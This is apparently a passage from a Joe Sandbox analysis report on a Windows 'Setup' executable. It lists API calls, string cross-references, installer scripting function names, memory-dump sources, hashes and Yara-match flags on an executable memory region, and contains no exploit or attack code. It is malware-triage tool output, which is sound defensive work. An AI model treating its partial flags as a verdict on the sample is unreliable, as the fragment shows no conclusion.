Part of subcall function 00494218: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00494231

SetErrorMode.KERNEL32(00000001,00000000,0049732F), ref: 00497301

Part of subcall function 00497030: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049730B,00000001,00000000,0049732F), ref: 0049703A
Part of subcall function 00497030: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497040

Part of subcall function 004244E4: SendMessageA.USER32(0001041A,0000B020,00000000,?), ref: 00424503

Part of subcall function 004242D4: SetWindowTextA.USER32(0001041A,00000000), ref: 004242EC

ShowWindow.USER32(0001041A,00000005,00000000,0049732F), ref: 00497362

Part of subcall function 00480D60: SetActiveWindow.USER32(0001041A), ref: 00480E0E

Strings

Setup, xrefs: 00497348

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
String ID: Setup
API String ID: 504348408-3839654196
Opcode ID: 4aed19435107d21c845e2285e67ddd24c6540714cee835c87807b7d5cec3157e
Instruction ID: 484f7198321d14ea4dea1c0131909a4d2337dd7c7bc9f77692fbd9f4dc694a4d
Opcode Fuzzy Hash: 4aed19435107d21c845e2285e67ddd24c6540714cee835c87807b7d5cec3157e
Instruction Fuzzy Hash: A731A2312182009ED6117BB7AC13A1D3A98EB8971CB92447FF80496563DE3D58109A6F

Function 02FEEBEF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00000000,?,?), ref: 02FEEC81

Strings

.dll, xrefs: 02FEEC26

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: .dll
API String ID: 1029625771-2738580789
Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction ID: a89e7a3b767d00b63f5e8b239e0bb9d729060cdd498919517a01c0f7a439a288
Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
Instruction Fuzzy Hash: B921B476A042859FEF23CFACE844B6A7BA4AF052B4F18416DDA178BA41D770E845C780

Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 00423259
LoadCursorA.USER32(00000000,00000000), ref: 00423283

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D

Function 02FED841 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02FED8BB
VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 02FEDBFF

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2fa0000_Setup.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction ID: e916103a43575a3d8f0521d693c90aefe2e8ec49767ed496642c3481dcd89f07
Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
Instruction Fuzzy Hash: 10B11332900701ABDF239E60CC80BABB7EDFF09794F140529EB9B86950E731E550CB92

Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7dca6d3b350593bcb106aa947d2912922e4a5a28430d75d7621880f3d1464153
Instruction ID: c6c1883332154edcea07d031ba9b2cfc07424a0243b3a275d2bdc855c8f8cb28
Opcode Fuzzy Hash: 7dca6d3b350593bcb106aa947d2912922e4a5a28430d75d7621880f3d1464153
Instruction Fuzzy Hash: D4F08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9

Function 004085E4 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603

Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11

Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98

Function 00406300 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1

Function 0042365C Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D

ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677

Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: InfoParametersSystem$ShowWindow
String ID:
API String ID: 3202724764-0
Opcode ID: e36c45370db0f26303ca7740186a3d66adabc33a9f043ab6e6c09d52c98a14fb
Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
Opcode Fuzzy Hash: e36c45370db0f26303ca7740186a3d66adabc33a9f043ab6e6c09d52c98a14fb
Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC

Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f03d6e23e0814ed38ad111c485b9c5f56edcb767316cc9ebf57e90da0b95743e
Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
Opcode Fuzzy Hash: f03d6e23e0814ed38ad111c485b9c5f56edcb767316cc9ebf57e90da0b95743e
Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9

Non-executed Functions

Function 0044AEAC Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 251libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75

LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004972BA), ref: 0044AED3
GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227

Strings

EnableTheming, xrefs: 0044B21F
GetThemeSysColorBrush, xrefs: 0044B0FF
GetThemeString, xrefs: 0044B015
GetThemeFilename, xrefs: 0044B0DB
DrawThemeEdge, xrefs: 0044AFA9
IsThemeDialogTextureEnabled, xrefs: 0044B1B3
GetThemePosition, xrefs: 0044B05D
GetThemeTextMetrics, xrefs: 0044AF73
GetThemeDocumentationProperty, xrefs: 0044B1FB
GetThemePartSize, xrefs: 0044AF4F
GetThemeBool, xrefs: 0044B027
SetWindowTheme, xrefs: 0044B0C9
IsThemeBackgroundPartiallyTransparent, xrefs: 0044AFDF
GetThemeAppProperties, xrefs: 0044B1C5
DrawThemeIcon, xrefs: 0044AFBB
GetThemeFont, xrefs: 0044B06F
GetCurrentThemeName, xrefs: 0044B1E9
IsThemePartDefined, xrefs: 0044AFCD
GetThemeSysInt, xrefs: 0044B159
GetThemeIntList, xrefs: 0044B0A5
GetThemeSysString, xrefs: 0044B147
EnableThemeDialogTexture, xrefs: 0044B1A1
HitTestThemeBackground, xrefs: 0044AF97
DrawThemeBackground, xrefs: 0044AF07
GetThemeBackgroundContentRect, xrefs: 0044AF2B, 0044AF3D
GetThemeBackgroundRegion, xrefs: 0044AF85
GetThemeRect, xrefs: 0044B081
GetThemeColor, xrefs: 0044AFF1
GetWindowTheme, xrefs: 0044B18F
GetThemeMetric, xrefs: 0044B003
GetThemePropertyOrigin, xrefs: 0044B0B7
SetThemeAppProperties, xrefs: 0044B1D7
uxtheme.dll, xrefs: 0044AECE
OpenThemeData, xrefs: 0044AEE3
GetThemeSysFont, xrefs: 0044B135
IsAppThemed, xrefs: 0044B17D
GetThemeInt, xrefs: 0044B039
GetThemeSysSize, xrefs: 0044B123
CloseThemeData, xrefs: 0044AEF5
GetThemeTextExtent, xrefs: 0044AF61
GetThemeMargins, xrefs: 0044B093
GetThemeSysColor, xrefs: 0044B0ED
DrawThemeText, xrefs: 0044AF19
GetThemeSysBool, xrefs: 0044B111
DrawThemeParentBackground, xrefs: 0044B20D
GetThemeEnumValue, xrefs: 0044B04B
IsThemeActive, xrefs: 0044B16B

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID: AddressProc$LibraryLoadVersion
String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
API String ID: 1968650500-2910565190
Opcode ID: 895fda115a0f6c19c3969f0f72d682d96e352ad9dd7a9aa3415c71dcd546b868
Instruction ID: a11b8a8c93d75e1a816c750273254881b3fbc77fa50ea3388d92a95babdd3c50
Opcode Fuzzy Hash: 895fda115a0f6c19c3969f0f72d682d96e352ad9dd7a9aa3415c71dcd546b868
Instruction Fuzzy Hash: B691C9B0A40B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E

Function 0048C314 Relevance: 136.6, APIs: 22, Strings: 55, Instructions: 1871COMMON

Download Yara Rule

Strings

USINGWINNT, xrefs: 0048CB61
GETSYSWOW64DIR, xrefs: 0048CA36
REGQUERYDWORDVALUE, xrefs: 0048D121
SETINISTRING, xrefs: 0048C60E
GETWINDIR, xrefs: 0048C9E6
SETINIINT, xrefs: 0048C67D
GETSHORTNAME, xrefs: 0048C9A9
FILEEXISTS, xrefs: 0048C35B
REGQUERYMULTISTRINGVALUE, xrefs: 0048D05F
STRINGCHANGE, xrefs: 0048CA86
REMOVEBACKSLASH, xrefs: 0048C8C9
REMOVEBACKSLASHUNLESSROOT, xrefs: 0048C901
FILEORDIREXISTS, xrefs: 0048C3CD
REGWRITESTRINGVALUE, xrefs: 0048D31D
GETTEMPDIR, xrefs: 0048CA5E
REGKEYEXISTS, xrefs: 0048CC49
ISADMINLOGGEDON, xrefs: 0048D7D3
SETINIBOOL, xrefs: 0048C6E8
GETENV, xrefs: 0048C7DB
REGWRITEEXPANDSTRINGVALUE, xrefs: 0048D434
REGGETVALUENAMES, xrefs: 0048CF30
CONVERTPERCENTSTR, xrefs: 0048CC08
FONTEXISTS, xrefs: 0048D81B
REGWRITEBINARYVALUE, xrefs: 0048D6F3
FILECOPY, xrefs: 0048CB85
REGQUERYBINARYVALUE, xrefs: 0048D1FE
REGWRITEDWORDVALUE, xrefs: 0048D61F
REGGETSUBKEYNAMES, xrefs: 0048CEC3
GETCMDTAIL, xrefs: 0048C813
CHARLENGTH, xrefs: 0048D8AC
REMOVEQUOTES, xrefs: 0048C971
REGQUERYSTRINGVALUE, xrefs: 0048CF9D
INIKEYEXISTS, xrefs: 0048C56A
ISINISECTIONEMPTY, xrefs: 0048C5C6
DELETEINISECTION, xrefs: 0048C7A1
ADDPERIOD, xrefs: 0048D874
STRINGCHANGEEX, xrefs: 0048CAED
DELETEINIENTRY, xrefs: 0048C753
REGWRITEMULTISTRINGVALUE, xrefs: 0048D515
ADDBACKSLASH, xrefs: 0048C891
PARAMCOUNT, xrefs: 0048C83B
SETNTFSCOMPRESSION, xrefs: 0048D8ED
REGDELETEKEYINCLUDINGSUBKEYS, xrefs: 0048CD68
GETINIBOOL, xrefs: 0048C4FF
DIREXISTS, xrefs: 0048C394
GETUILANGUAGE, xrefs: 0048D84F
REGVALUEEXISTS, xrefs: 0048CCC6
PARAMSTR, xrefs: 0048C85F
REGDELETEVALUE, xrefs: 0048CE1E
GETINIINT, xrefs: 0048C47A
GETINISTRING, xrefs: 0048C406
GETSYSTEMDIR, xrefs: 0048CA0E
ADDQUOTES, xrefs: 0048C939
ISPOWERUSERLOGGEDON, xrefs: 0048D7F7
REGDELETEKEYIFEMPTY, xrefs: 0048CDC3

Memory Dump Source

Source File: 00000000.00000002.2080154679.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2080141156.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.0000000000498000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080200871.000000000049C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2080228321.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Setup.jbxd

Similarity

API ID:
String ID: ADDBACKSLASH$ADDPERIOD$ADDQUOTES$CHARLENGTH$CONVERTPERCENTSTR$DELETEINIENTRY$DELETEINISECTION$DIREXISTS$FILECOPY$FILEEXISTS$FILEORDIREXISTS$FONTEXISTS$GETCMDTAIL$GETENV$GETINIBOOL$GETINIINT$GETINISTRING$GETSHORTNAME$GETSYSTEMDIR$GETSYSWOW64DIR$GETTEMPDIR$GETUILANGUAGE$GETWINDIR$INIKEYEXISTS$ISADMINLOGGEDON$ISINISECTIONEMPTY$ISPOWERUSERLOGGEDON$PARAMCOUNT$PARAMSTR$REGDELETEKEYIFEMPTY$REGDELETEKEYINCLUDINGSUBKEYS$REGDELETEVALUE$REGGETSUBKEYNAMES$REGGETVALUENAMES$REGKEYEXISTS$REGQUERYBINARYVALUE$REGQUERYDWORDVALUE$REGQUERYMULTISTRINGVALUE$REGQUERYSTRINGVALUE$REGVALUEEXISTS$REGWRITEBINARYVALUE$REGWRITEDWORDVALUE$REGWRITEEXPANDSTRINGVALUE$REGWRITEMULTISTRINGVALUE$REGWRITESTRINGVALUE$REMOVEBACKSLASH$REMOVEBACKSLASHUNLESSROOT$REMOVEQUOTES$SETINIBOOL$SETINIINT$SETINISTRING$SETNTFSCOMPRESSION$STRINGCHANGE$STRINGCHANGEEX$USINGWINNT
API String ID: 0-948651152
Opcode ID: c5ac362169ef17d516bde81f0ab62d9bf2add14a6b361e85a49da187dada90fb
Instruction ID: c81f30af598708684482e2d6f726b1b04c7ab06f8c2cca7a5fd7312a9be7574b
Opcode Fuzzy Hash: c5ac362169ef17d516bde81f0ab62d9bf2add14a6b361e85a49da187dada90fb
Instruction Fuzzy Hash: 85D25070F012155BDB04FB79C8829AEB7A5AF58704F21993FF401A7386DE38ED068799

Function 02FB2FEE Relevance: 129.6, Strings: 102, Instructions: 2085COMMON

Download Yara Rule

Strings

$, xrefs: 02FB442C
u, xrefs: 02FB3B00
h, xrefs: 02FB4C23
?, xrefs: 02FB445C
$, xrefs: 02FB3B48
), xrefs: 02FB37A7
F, xrefs: 02FB41AF
", xrefs: 02FB3BCF
H, xrefs: 02FB448C
P, xrefs: 02FB47E8
z, xrefs: 02FB392F
#, xrefs: 02FB3B40
x, xrefs: 02FB41BF
+, xrefs: 02FB37B7
D, xrefs: 02FB49C3
X, xrefs: 02FB3C90
L, xrefs: 02FB415F
%, xrefs: 02FB3787
D, xrefs: 02FB3B30
g, xrefs: 02FB43CB
X, xrefs: 02FB47A8
P, xrefs: 02FB3CD0
~, xrefs: 02FB3BFF
j, xrefs: 02FB4C13
0, xrefs: 02FB4828
5, xrefs: 02FB48E8
~, xrefs: 02FB48B8
-, xrefs: 02FB37C7
F, xrefs: 02FB4868
H, xrefs: 02FB3B10
, xrefs: 02FB3B28
9, xrefs: 02FB443C
|, xrefs: 02FB41DF
I, xrefs: 02FB44EC
J, xrefs: 02FB4838
!, xrefs: 02FB3767
\, xrefs: 02FB4021
m, xrefs: 02FB47B8
J, xrefs: 02FB44BC
Empty, xrefs: 02FB3588, 02FB3677, 02FB3892, 02FB3A70
@, xrefs: 02FB48D8
i, xrefs: 02FB4C1B
+, xrefs: 02FB41C7
,, xrefs: 02FB37BF
M, xrefs: 02FB457C
@, xrefs: 02FB417F
D, xrefs: 02FB4ED0
|, xrefs: 02FB3BEF
G, xrefs: 02FB449C
", xrefs: 02FB3B38
Z, xrefs: 02FB3CA0
f, xrefs: 02FB4788
A, xrefs: 02FB454C
J, xrefs: 02FB455C
h, xrefs: 02FB3248
l, xrefs: 02FB4798
,, xrefs: 02FB3B08
(, xrefs: 02FB4BFB
B, xrefs: 02FB48C8
., xrefs: 02FB446C
k, xrefs: 02FB47D8
#, xrefs: 02FB3777
`, xrefs: 02FB45BC
`, xrefs: 02FB38BA
p, xrefs: 02FB32E4
], xrefs: 02FB456C
i, xrefs: 02FB4848
\, xrefs: 02FB3CB0
U, xrefs: 02FB450C
%, xrefs: 02FB4187
k, xrefs: 02FB47F8
b, xrefs: 02FB47C8
Q, xrefs: 02FB451C
t, xrefs: 02FB31F6
L, xrefs: 02FB401C
', xrefs: 02FB3797
R, xrefs: 02FB4898
j, xrefs: 02FB3BDF
H, xrefs: 02FB44AC
B, xrefs: 02FB418F
., xrefs: 02FB3B18
/, xrefs: 02FB444C
z, xrefs: 02FB41CF
{, xrefs: 02FB41D7
T, xrefs: 02FB453C
[, xrefs: 02FB324D
C, xrefs: 02FB35B5
F, xrefs: 02FB4858
?, xrefs: 02FB3757
_, xrefs: 02FB3CC8
N, xrefs: 02FB416F
V, xrefs: 02FB44FC
a, xrefs: 02FB4BF3
-, xrefs: 02FB447C
w, xrefs: 02FB4C2B
s, xrefs: 02FB458C
M, xrefs: 02FB48A8
D, xrefs: 02FB419F
^, xrefs: 02FB3CC0
{, xrefs: 02FB4888
`, xrefs: 02FB3D9D
u, xrefs: 02FB4808

Memory Dump Source

Source File: 00000000.00000002.2080803681.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

